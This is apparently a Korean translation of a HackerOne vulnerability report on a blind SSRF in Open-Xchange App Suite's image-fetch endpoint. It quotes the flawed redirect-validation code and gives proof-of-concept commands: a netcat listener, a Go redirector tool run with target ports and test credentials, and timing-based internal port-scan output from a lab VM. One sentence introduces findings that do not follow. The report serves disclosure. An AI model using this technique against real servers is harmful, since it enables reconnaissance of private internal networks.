
https://hackerone.com/reports/865652
/appsuite/api/oxodocumentfilter&action=addfile 처리 시 외부 URL에서 이미지를 가져오는 AddFileAction.getImageDataFromUrl의 로직은 여기에 구현되어 있으며, 모든 리다이렉트를 따라간 후에만 리다이렉트된 URL을 검증합니다.
response = httpClient.execute(getRequest, context);
int statusCode = response.getStatusLine().getStatusCode();
if (statusCode == HttpStatus.SC_OK) {
List<URI> locations = context.getRedirectLocations();
if (locations != null) {
for (URI uri : locations) {
try {
Optional<OXException> oxException = validator.apply(uri.toURL());
if (oxException.isPresent()) {
throw (RESTException) oxException.get().getCause();
}
} catch (MalformedURLException e) {
throw new RESTException(ErrorCode.GENERAL_ARGUMENTS_ERROR, e);
}
};
}
long length = response.getEntity().getContentLength();
...
}
이로 인해 공격자가 블라인드 SSRF 공격을 실행할 수 있습니다.
127.0.0.1:7070에서 수신 대기하도록 다음 명령을 실행합니다.
nc -l 127.0.0.1 -p 7070
go run . -redirectorAddress="172.16.146.1:8081" -targetPorts="7070" -serverRoot="http://172.16.66.130" -username="testuser" -password="secret"
위 명령을 실행하면 netcat에 다음과 같은 출력이 표시됩니다.
GET /image.png HTTP/1.1
Accept: *
Accept-Encoding: gzip
Host: 127.0.0.1:7070
Connection: Keep-Alive
User-Agent: Open-Xchange Image Url Data Fetcher
이 취약점은 블라인드 SSRF이므로 HTTP 요청의 응답을 읽을 수는 없지만, 정찰(reconnaissance)에 사용될 수 있습니다.
서버의 로컬 네트워크에서 7070,61616,8004,80,22,25,8080,3125 포트에 대한 포트 스캔을 실행하려면 다음 명령을 실행합니다.
go run . -redirectorAddress="172.16.146.1:8081" -targetPorts="7070,61616,8004,80,22,8080,3125" -serverRoot="http://172.16.66.130" -username="testuser" -password="secret" -numSamples=20
출력:
2020/05/04 13:32:42 7070: 2.220000
2020/05/04 13:32:42 61616: 3567.000000
2020/05/04 13:32:42 8004: 2.980000
2020/05/04 13:32:42 80: 3.180000
2020/05/04 13:32:42 22: 34.600000
2020/05/04 13:32:42 25: 2169.333333
2020/05/04 13:32:42 8080: 2.560000
2020/05/04 13:32:42 3125: 3.000000
lsof를 사용하여 VM 내부의 열린 포트를 확인할 수 있습니다.
sudo lsof -nP -iTCP -sTCP:LISTEN
출력:
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
java 467 open-xchange 15u IPv6 13049 0t0 TCP 172.16.66.130:9994 (LISTEN)
java 467 open-xchange 16u IPv6 15970 0t0 TCP *:42319 (LISTEN)
java 467 open-xchange 24u IPv6 14136 0t0 TCP 127.0.0.1:61616 (LISTEN)
java 467 open-xchange 33u IPv6 16419 0t0 TCP *:8004 (LISTEN)
java 489 open-xchange 37u IPv6 14138 0t0 TCP 127.0.0.1:9999 (LISTEN)
java 489 open-xchange 42u IPv6 17565 0t0 TCP 127.0.0.1:1099 (LISTEN)
java 489 open-xchange 47u IPv6 14144 0t0 TCP 127.0.0.1:5701 (LISTEN)
java 489 open-xchange 127u IPv6 15345 0t0 TCP *:36149 (LISTEN)
java 489 open-xchange 144u IPv6 17559 0t0 TCP 127.0.0.1:8009 (LISTEN)
apache2 526 root 3u IPv6 13789 0t0 TCP *:80 (LISTEN)
apache2 527 www-data 3u IPv6 13789 0t0 TCP *:80 (LISTEN)
apache2 528 www-data 3u IPv6 13789 0t0 TCP *:80 (LISTEN)
mysqld 695 mysql 26u IPv4 13847 0t0 TCP 127.0.0.1:3306 (LISTEN)
exim4 1077 Debian-exim 3u IPv4 13115 0t0 TCP 127.0.0.1:25 (LISTEN)
exim4 1077 Debian-exim 4u IPv6 13116 0t0 TCP [::1]:25 (LISTEN)
sshd 1345 root 3u IPv4 14259 0t0 TCP 172.16.66.130:22 (LISTEN)
sshd 1345 root 4u IPv4 14261 0t0 TCP 127.0.0.1:22 (LISTEN)
위 출력에서 다음과 같은 사실을 확인할 수 있습니다.
따라서 공격자는 이 취약점을 사용하여 대부분의 열린 포트를 탐지하고, 응답 시간을 사용하여 연결 유형(ssh / exim / activemq 등)을 식별할 수 있습니다.